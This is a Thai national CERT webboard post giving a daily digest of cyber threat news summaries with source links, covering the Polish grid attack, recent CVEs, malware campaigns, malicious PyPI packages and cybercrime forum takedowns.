NCSA Webboard
    • ล่าสุด
    • แท็ก
    • ฮิต
      • ติดต่อสำนักงาน
    • ลงทะเบียน
    • เข้าสู่ระบบ

    Cyber Threat Intelligence 29 January 2026

    Cyber Security News
    1
    1
    179
    โหลดโพสเพิ่มเติม
    • เก่าสุดไปยังใหม่สุด
    • ใหม่สุดไปยังเก่าสุด
    • Most Votes
    ตอบ
    • ตอบโดยตั้งกระทู้ใหม่
    เข้าสู่ระบบเพื่อตอบกลับ
    Topic นี้ถูกลบไปแล้ว เฉพาะผู้ใช้งานที่มีสิทธิ์ในการจัดการ Topic เท่านั้นที่จะมีสิทธิ์ในการเข้าชม
    • NCSA_THAICERTN
      NCSA_THAICERT
      แก้ไขล่าสุดโดย

      Energy Sector

      • Cyberattack On Polish Energy Grid Impacted Around 30 Facilities
        "The coordinated attack on Poland's power grid in late December targeted multiple distributed energy resource (DER) sites across the country, including combined heat and power (CHP) facilities and wind and solar dispatch systems. Although the attacker compromised operational technology (OT) systems damaging "key equipment beyond repair," they failed to disrupt power, totalling 1.2 GW or 5% of Poland’s energy supply. Based on public reports, there are at least 12 confirmed affected sites. However, researchers at Dragos, a critical industrial infrastructure (OT) and control systems (ICS) security company say that the number is approximately 30."
        https://www.bleepingcomputer.com/news/security/cyberattack-on-polish-energy-grid-impacted-around-30-facilities/
        https://hub.dragos.com/report/electrum-targeting-polands-electric-sector
        https://5943619.hs-sites.com/hubfs/Reports/dragos-2025-poland-attack-report.pdf
        https://thehackernews.com/2026/01/russian-electrum-tied-to-december-2025.html
        https://therecord.media/poland-electrical-grid-cyberattack-30-facilities-affected

      Vulnerabilities

      • Achieving Remote Code Execution On n8n Via Sandbox Escape - CVE-2026-1470 & CVE-2026-0863
        "The JFrog Security Research team recently discovered and disclosed two vulnerabilities in n8n’s sandbox mechanism: CVE-2026-1470, rated 9.9 Critical, impacting the expression evaluation engine, and CVE-2026-0863, rated 8.5 High, affecting Python execution in the Code node (“Internal” mode). n8n is a popular AI workflow automation platform that combines AI capabilities with business process automation."
        https://research.jfrog.com/post/achieving-remote-code-execution-on-n8n-via-sandbox-escape/
        https://thehackernews.com/2026/01/two-high-severity-n8n-flaws-allow.html
        https://www.bleepingcomputer.com/news/security/new-sandbox-escape-flaw-exposes-n8n-instances-to-rce-attacks/
        https://www.infosecurity-magazine.com/news/n8n-sandbox-flaws-allow-rce/
      • SolarWinds Warns Of Critical Web Help Desk RCE, Auth Bypass Flaws
        "SolarWinds has released security updates to patch critical authentication bypass and remote command execution vulnerabilities in its Web Help Desk IT help desk software. The authentication bypass security flaws (tracked as CVE-2025-40552 and CVE-2025-40554) patched today by SolarWinds were reported by watchTowr's Piotr Bazydlo and can be exploited by remote unauthenticated threat actors in low-complexity attacks. Bazydlo also found and reported a critical remote code execution (RCE) flaw (CVE-2025-40553) stemming from an untrusted data deserialization weakness that can enable attackers without privileges to run commands on vulnerable hosts."
        https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
      • New Architecture, New Risks: One-Click To Pwn IDIS IP Cameras
        "Modern capabilities, such as cloud-powered management, analytics, and detection, have introduced a new architectural era to IP-based video surveillance, which remains a prominent safety feature across enterprises, manufacturing facilities, military installations, and even apartments and small businesses. What was once a world of on-premesis network video recorders (NVRs), local storage arrays, and LAN-based management systems is now a connected environment largely operating in the cloud."
        https://claroty.com/team82/research/new-architecture-new-risks-one-click-to-pwn-idis-ip-cameras
        https://www.bankinfosecurity.com/idis-surveillance-management-software-vulnerable-to-hacking-a-30616
      • CISA Adds One Known Exploited Vulnerability To Catalog
        "CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
        CVE-2026-24858 Fortinet Multiple Products Authentication Bypass Using an Alternate Path or Channel Vulnerability"
        https://www.cisa.gov/news-events/alerts/2026/01/27/cisa-adds-one-known-exploited-vulnerability-catalog
        https://securityaffairs.com/187435/security/u-s-cisa-adds-a-flaw-in-multiple-fortinet-products-to-its-known-exploited-vulnerabilities-catalog-2.html
      • Bypassing Windows Administrator Protection
        "A headline feature introduced in the latest release of Windows 11, 25H2 is Administrator Protection. The goal of this feature is to replace User Account Control (UAC) with a more robust and importantly, securable system to allow a local user to access administrator privileges only when necessary. This blog post will give a brief overview of the new feature, how it works and how it’s different from UAC. I’ll then describe some of the security research I undertook while it was in the insider preview builds on Windows 11."
        https://projectzero.google/2026/26/windows-administrator-protection.html
        https://www.theregister.com/2026/01/28/google_windows_admin_exploit/

      Malware

      • Viral Moltbot AI Assistant Raises Concerns Over Data Security
        "Security researchers are warning of insecure deployments in enterprise environments of the Moltbot (formerly Clawdbot) AI assistant, which can lead to leaking API keys, OAuth tokens, conversation history, and credentials. Moltbot is an open-source personal AI assistant with deep system integration created by Peter Steinberger that can be hosted locally on user devices and integrated directly with the user’s apps, including messengers and email clients, as well as the filesystem. Unlike cloud-based chatbots, Moltbot can run 24/7 locally, maintaining a persistent memory, proactively reaching out to the user for alerts/reminders, executing scheduled tasks, and more."
        https://www.bleepingcomputer.com/news/security/viral-moltbot-ai-assistant-raises-concerns-over-data-security/
        https://thehackernews.com/2026/01/fake-moltbot-ai-coding-assistant-on-vs.html
      • Operation Bizarre Bazaar: First Attributed LLMjacking Campaign With Commercial Marketplace Monetization
        "Between December 2025 and January 2026, Pillar Security Research team uncovered a disturbing evolution in AI-focused cyber threats. Our honeypots captured 35,000 attack sessions targeting exposed AI infrastructure. We have named this campaign Operation Bizarre Bazaar. It represents the first public documentation of a systematic campaign targeting exposed LLM and Model Context Protocol (MCP) endpoints at scale, featuring complete commercial monetization. The investigation reveals how cybercriminals discover, validate, and monetize unauthorized access to AI infrastructure through a coordinated supply chain spanning reconnaissance, validation, and commercial resale."
        https://www.pillar.security/blog/operation-bizarre-bazaar-first-attributed-llmjacking-campaign-with-commercial-marketplace-monetization
        https://www.pillar.security/resources/operation-bizarre-bazaar
        https://www.bleepingcomputer.com/news/security/hackers-hijack-exposed-llm-endpoints-in-bizarre-bazaar-operation/
      • Can’t Stop, Won’t Stop: TA584 Innovates Initial Access
        "Proofpoint tracks multiple sophisticated cybercriminal threat actors, and one of the most frequently active with high volume campaigns is TA584. TA584 is a prominent initial access broker (IAB) that targets organizations globally. In the second half of 2025, TA584 demonstrated multiple attack chain changes including adopting ClickFix social engineering, expanded targeting to more consistently target specific geographies and languages, and recently delivering a new malware called Tsundere Bot. TA584 overlaps with a group tracked as Storm-0900."
        https://www.proofpoint.com/us/blog/threat-insight/cant-stop-wont-stop-ta584-innovates-initial-access
        https://www.bleepingcomputer.com/news/security/initial-access-hackers-switch-to-tsundere-bot-for-ransomware-attacks/
      • Trusted, Signed, Still Malicious. Exploiting Custom Email Text To Bypass Security Controls
        "A recent series of phone scam emails has been able to bypass traditional email security measures by placing malicious messages within document names, online meeting descriptions, or account name fields. These emails redirect otherwise legitimate business emails to potential victims, and are particularly notable for embedding phone scams and other malicious content while still retaining the legitimate business’s From address. This makes the email appear to originate from a trusted sender, even though it actually contains a malicious message written by the threat actor. While spoofing the From address would typically trigger failures from Sender Policy Framework (SPF) headers and editing an email would typically trigger failures from DomainKeys Identified Mail (DKIM) headers, these sample emails pass both these security checks because the email was technically sent from a legitimate and trusted source."
        https://cofense.com/blog/trusted,-signed,-still-malicious-exploiting-custom-email-text-to-bypass-security-controls
      • Phishing At Cloud Scale: How AWS Is Abused For Credential Theft
        "Threat actors are abusing web services from Amazon like Simple Storage Service (S3) buckets, Amazon Simple Email Service (SES), and Amazon Web Service (AWS) Amplify to launch credential phishing attacks due to their trusted infrastructure, scalability, and ease of abuse. AWS offers threat actors a cloak of legitimacy, bypassing many traditional email based security controls like Secure Email Gateways (SEGs) and other email security technologies, amplifying the risk in today’s connected digital landscape. This report outlines how AWS is abused, supported by examples and phishing trends from June 2021 to December 2025."
        https://cofense.com/blog/phishing-at-cloud-scale-how-aws-is-abused-for-credential-theft
      • Unveiling The Weaponized Web Shell EncystPHP
        "FortiGuard Labs has discovered a web shell that we named “EncystPHP.” It features several advanced capabilities, including remote command execution, persistence mechanisms, and web shell deployment. Incidents were launched in early December last year and propagated via exploitation of the FreePBX vulnerability CVE-2025-64328. Its malicious activity appears to be associated with the hacker group INJ3CTOR3, first identified in 2020, which targeted CVE-2019-19006. In 2022, the threat actor shifted its focus to the Elastix system via CVE-2021-45461. These incidents begin with the exploitation of a FreePBX vulnerability, followed by the deployment of a PHP web shell in the target environments. We assess that this campaign represents recent attack activity and behavior patterns associated with INJ3CTOR3."
        https://www.fortinet.com/blog/threat-research/unveiling-the-weaponized-web-shell-encystphp
        Android.Phantom Trojans Are Bundled With Modded Games And Popular Apps To Infiltrate Smartphones. They * Use Machine Learning And Video Broadcasts To Engage In Click Fraud
        "Experts at the Doctor Web antivirus laboratory have discovered and investigated a new trojan clicker malware family. All of these trojans either are administered via the hxxps[:]//dllpgd[.]click server or get downloaded and launched after the corresponding instruction is received from the remote host. Malware belonging to this family infects Android smartphones. Xiaomi’s GetApps software catalogue is one of its principal distribution channels.
        https://news.drweb.com/show/?i=15110&lng=en
        https://hackread.com/phantom-malware-android-game-mods-ad-fraud/
      • PureRAT: Attacker Now Using AI To Build Toolset
        "A Vietnamese threat actor is likely using AI to author code powering an ongoing phishing campaign delivering the PureRAT malware and other payloads. The phishing emails masquerade as job opportunities and the attacker may be using them as a lure in the hope that recipients open the emails using work computers. The attacker’s usage of AI provides further evidence that the technology is being used by lower-skilled attackers to assist with developing tools and automating their attacks."
        https://www.security.com/threat-intelligence/ai-purerat-phishing
        https://www.infosecurity-magazine.com/news/emojis-in-purerats-code/
      • Malicious PyPI Packages Spellcheckpy And Spellcheckerpy Deliver Python RAT
        "On January 20th and 21st, 2026, our malware detection pipeline flagged two new PyPI packages: spellcheckerpy and spellcheckpy. Both claimed to be the legitimate author of pyspellchecker library. Both are linked to his real GitHub repo. They weren't his. Hidden inside the Basque language dictionary file was a base64-encoded payload that downloads a full-featured Python RAT. The attacker published three "dormant" versions first, payload present, trigger absent, then flipped the switch with spellcheckpy v1.2.0, adding an obfuscated execution trigger that fires the moment you import SpellChecker."
        https://www.aikido.dev/blog/malicious-pypi-packages-spellcheckpy-and-spellcheckerpy-deliver-python-rat
        https://thehackernews.com/2026/01/fake-python-spellchecker-packages-on.html
      • Love? Actually: Fake Dating App Used As Lure In Targeted Spyware Campaign In Pakistan
        "ESET researchers have uncovered an Android spyware campaign leveraging romance scam tactics to target individuals in Pakistan. The campaign uses a malicious app posing as a chat platform that allows users to initiate conversations with specific “girls” – fake profiles probably operated via WhatsApp. Underneath the romance charade, the real purpose of the malicious app, which we named GhostChat, is exfiltration of the victim’s data – both upon first execution and continually while the app is installed on the device. The campaign employs a layer of deception that we have not previously seen in similar schemes – the fake female profiles in GhostChat are presented to potential victims as locked, with passcodes required to access them."
        https://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/
        https://www.helpnetsecurity.com/2026/01/29/ghostchat-android-romance-spyware/

      General News

      • Audits For AI Systems That Keep Changing
        "Security and risk teams often rely on documentation and audit artifacts that reflect how an AI system worked months ago. ETSI’s continuous auditing based conformity assessment specification (ETSI TS 104 008) describes a different approach, where conformity is evaluated through recurring measurement and automated evidence collection tied to live system behavior."
        https://www.helpnetsecurity.com/2026/01/28/etsi-ts-104-008-ai-continuous-auditing/
        https://www.etsi.org/deliver/etsi_ts/104000_104099/104008/01.01.01_60/ts_104008v010101p.pdf
      • FBI Seizes RAMP Cybercrime Forum Used By Ransomware Gangs
        "The FBI has seized the notorious RAMP cybercrime forum, a platform used to advertise a wide range of malware and hacking services, and one of the few remaining forums that openly allowed the promotion of ransomware operations. Both the forum's Tor site and its clearnet domain, ramp4u[.]io, now display a seizure notice stating, "The Federal Bureau of Investigation has seized RAMP.""
        https://www.bleepingcomputer.com/news/security/fbi-seizes-ramp-cybercrime-forum-used-by-ransomware-gangs/
        https://hackread.com/russian-cybercrime-ramp-forum-seized-fbi/
        https://www.theregister.com/2026/01/28/fbi_seizes_ramp_forum/
      • Empire Cybercrime Market Owner Pleads Guilty To Drug Conspiracy
        "A Virginia man who co-created Empire Market, one of the largest dark web marketplaces at the time, pleaded guilty to federal drug conspiracy charges for facilitating $430 million in illegal transactions from 2018 to 2020. The marketplace operated as a hidden service accessible only via TOR browsers and was advertised as an AlphaBay "clone," modeled after the notorious dark web marketplace shut down by authorities in 2017."
        https://www.bleepingcomputer.com/news/security/empire-cybercrime-market-owner-pleads-guilty-to-drug-conspiracy/
      • Slovakian Man Pleads Guilty To Operating Darknet Marketplace
        "A Slovakian national admitted on Tuesday to helping operate a darknet marketplace that sold narcotics, cybercrime tools and services, fake government IDs, and stolen personal information for more than two years. 33-year-old Alan Bill (also known online as "Vend0r" or "KingdomOfficial") pleaded guilty to conspiracy to distribute controlled substances for his role in running Kingdom Market, which operated from March 2021 through December 2023."
        https://www.bleepingcomputer.com/news/security/slovakian-man-pleads-guilty-to-operating-kingdown-market-cybercrime-marketplace/
      • The Trends Defining Cyber Security In 2026: Cyber Security Report 2026
        "Security programs are being asked to defend increasingly complex environments against cyber attacks that are faster, more automated, and harder to isolate. The past year of attacks reveals a measurable shift in how adversaries operate, coordinate, and scale across enterprise environments. The Cyber Security Report 2026 is based on direct analysis of global attack activity spanning AI driven attacks, ransomware operations, hybrid environments, and multi channel social engineering. It documents how these techniques are being executed in practice, at scale, across industries and regions."
        https://blog.checkpoint.com/research/the-trends-defining-cyber-security-in-2026-cyber-security-report-2026/
      • Consumers Reluctant To Shop At Stores That Don't Take Security Seriously
        "While it's nearly impossible for retail organizations to avoid incidents these days, implementing effective security protocols should be a top priority, as consumers become more security-savvy. Threat actors target the retail sector because shops hold highly coveted information, like financial and purchasing history, that can be further abused in fraud scams. And unlike more regulated sectors such as energy or financial services, that information may not be as tightly protected, especially among small mom-and-pops with fewer resources."
        https://www.darkreading.com/cyber-risk/consumers-reluctant-to-shop-at-stores-hit-by-cyberattacks
      • Surging Cyberattacks Boost Latin America To Riskiest Region
        "Latin America and the Caribbean can now lay claim to an unenviable status: cyberattackers' favorite region to target with cyberattacks. Organizations in Latin America saw an average of 3,065 attacks per week last year, a year-over-year surge of 26%, leapfrogging Africa as the top geographic region for cyber-risk, according to the latest data from Check Point Research. About three-quarters (76%) of organizations suffered information disclosure attacks, while a majority also encountered attempts at remote code execution and authentication bypass. In all, Latin American organizations see about 40% more attacks than the global average."
        https://www.darkreading.com/cyber-risk/surging-cyberattacks-latin-america-riskiest-region
      • Grammarly And QuillBot Are Among Widely Used Chrome Extensions Facing Serious Privacy Questions
        "A new study shows that some of the most widely used AI-powered browser extensions are a privacy risk. They collect lots of data and require a high level of browser access. The research was conducted by Incogni, which analyzed 442 AI-powered Google Chrome extensions for its 2026 privacy risk report. The study reviewed extensions across eight categories and assessed their permissions, declared data collection practices, and security risk scores."
        https://www.helpnetsecurity.com/2026/01/28/incogni-chrome-extensions-privacy-risks-report/
      • Zscaler 2026 AI Threat Report: 91% Year-Over-Year Surge In AI Activity Creates Growing Oversight Gap For Global Enterprises
        "Zscaler, Inc. (NASDAQ: ZS), the leader in cloud security, today released the findings of the ThreatLabz 2026 AI Security Report, warning that enterprises are unprepared for the next wave of AI‑driven cyber risk, even as AI becomes embedded in business operations. Based on an analysis of nearly one trillion AI/ML transactions across the Zscaler Zero Trust Exchange™ platform between January and December of 2025, the research shows that enterprises are reaching a tipping point where AI has transitioned from a productivity tool to a primary vector for autonomous, machine-speed conflict."
        https://www.zscaler.com/press/zscaler-2026-ai-threat-report-91-year-over-year-surge-ai-activity-creates-growing-oversight
        https://www.infosecurity-magazine.com/news/ai-security-threats-loom-zscaler/
      • Researchers Uncover 454,000+ Malicious Open Source Packages
        "Security researchers have warned that the open source ecosystem has become a “structural risk,” after revealing another surge in malicious packages last year. Sonatype said in its 2026 State of the Software Supply Chain report that developers downloaded components 9.8 trillion times last year across Maven Central, PyPl, npm and NuGet. The challenge is that many of these contained malware or vulnerabilities. The security vendor said it discovered 454,648 new malicious packages last year, warning that threats had evolved from “spam and stunts” into “sustained, industrialized campaigns” – many of which are state sponsored."
        https://www.infosecurity-magazine.com/news/454000-malicious-open-source/
      • Chinese Language Money Laundering Networks Emerge As Major Facilitators Of The Illicit Crypto Economy, Now Driving 20% Of Laundering Activity
        "After emerging at the start of the pandemic, Chinese-language money laundering networks (CMLNs) now dominate known crypto money laundering activity, processing an estimated 20% of illicit crypto funds over the past five years. This growth is 7,325 times faster than growth of illicit inflows to centralized exchanges since 2020. CMLNs processed $16.1 billion in 2025 — approximately $44 million per day across 1,799+ active wallets. Chainalysis has identified on-chain behavioral fingerprints of six distinct service types within the CMLN ecosystem. Black U and gambling services fragment large transactions into small amounts to evade detection, while over-the-counter (OTC) services consolidate small transactions into large amounts for integration."
        https://www.chainalysis.com/blog/2026-crypto-money-laundering/
        https://www.infosecurity-magazine.com/news/chinese-money-launderers-global/
      • 2026 Public Sector Cyber Outlook: Identity, AI And The Fight For Trust
        "The early weeks of 2026 have already made one thing clear: Government cybersecurity is in a new phase, shaped not by incremental change, but by the rapid integration of AI into core public-sector missions. AI systems are now embedded in critical infrastructure, federal service delivery, research environments, as well as state and local operations. At the same time, nation-state adversaries are leveraging AI to accelerate intrusion, scale deception and manipulate trusted systems in ways not possible even a year ago."
        https://www.paloaltonetworks.com/blog/2026/01/public-sector-cyber-outlook/
      • 7 Predictions For The 2026 Threat Landscape: Navigating The Year Ahead
        "As we navigate 2026, the pace of technological change continues to accelerate — and with it, the cyber threat landscape. Over the past year, our ThreatLabz research team has analyzed countless threats, uncovering trends that give us a clear view of the challenges and opportunities that lie ahead. The rise of artificial intelligence, the dissolution of the traditional perimeter into a hyper-distributed attack surface of users, devices, and applications, and the industrialization of cybercrime demand a new level of vigilance and a modern, AI-powered defensive strategy."
        https://www.zscaler.com/blogs/security-research/7-predictions-2026-threat-landscape-navigating-year-ahead
      • Cyber Insights 2026: Offensive Security; Where It Is And Where It’s Going
        "Cyber red teaming will change more in the next 24 months than it has in the past ten years. Malicious attacks are increasing in frequency, sophistication and damage. Defenders need to find and harden system weaknesses before attackers can attack them. That requires red teams to do more, faster."
        https://www.securityweek.com/cyber-insights-2026-offensive-security-where-it-is-and-where-its-going/
      • Why We Can’t Let AI Take The Wheel Of Cyber Defense
        "If you want to waste the incredible potential of artificial intelligence, there is a quick way to do it: confuse automation with actual safety or mistake a shiny new tech feature for true resilience. We are currently living through a strange and intense moment in the security world. AI development is moving at a speed that most companies honestly can’t handle, yet the market is flooded with sales pitches promising “autonomous” cyber defenses. The narrative is always the same: install this system, and it will clean up your security mess while you go grab a coffee."
        https://www.securityweek.com/why-we-cant-let-ai-take-the-wheel-of-cyber-defense/
      • From Concept To Practice: How SSVC Has Evolved To Make Adoption Possible
        "It’s Patch Tuesday. Your software scanners light up with almost 70 percent more vulnerabilities than last month, and by Friday you’re expected to explain, clearly and defensibly, which ones matter, which ones wait, and which ones could put the organization at real risk if ignored. Your teams are already stretched, new AI-enabled software is landing faster than it can be inventoried, and every dashboard insists its prioritization should come first."
        https://www.sei.cmu.edu/blog/from-concept-to-practice-how-ssvc-has-evolved-to-make-adoption-possible/

      อ้างอิง
      Electronic Transactions Development Agency (ETDA) 9ade4708-d0eb-41f1-9b87-06f89e390773-image.png

      1 การตอบกลับ คำตอบล่าสุด ตอบ คำอ้างอิง 0
      • First post
        Last post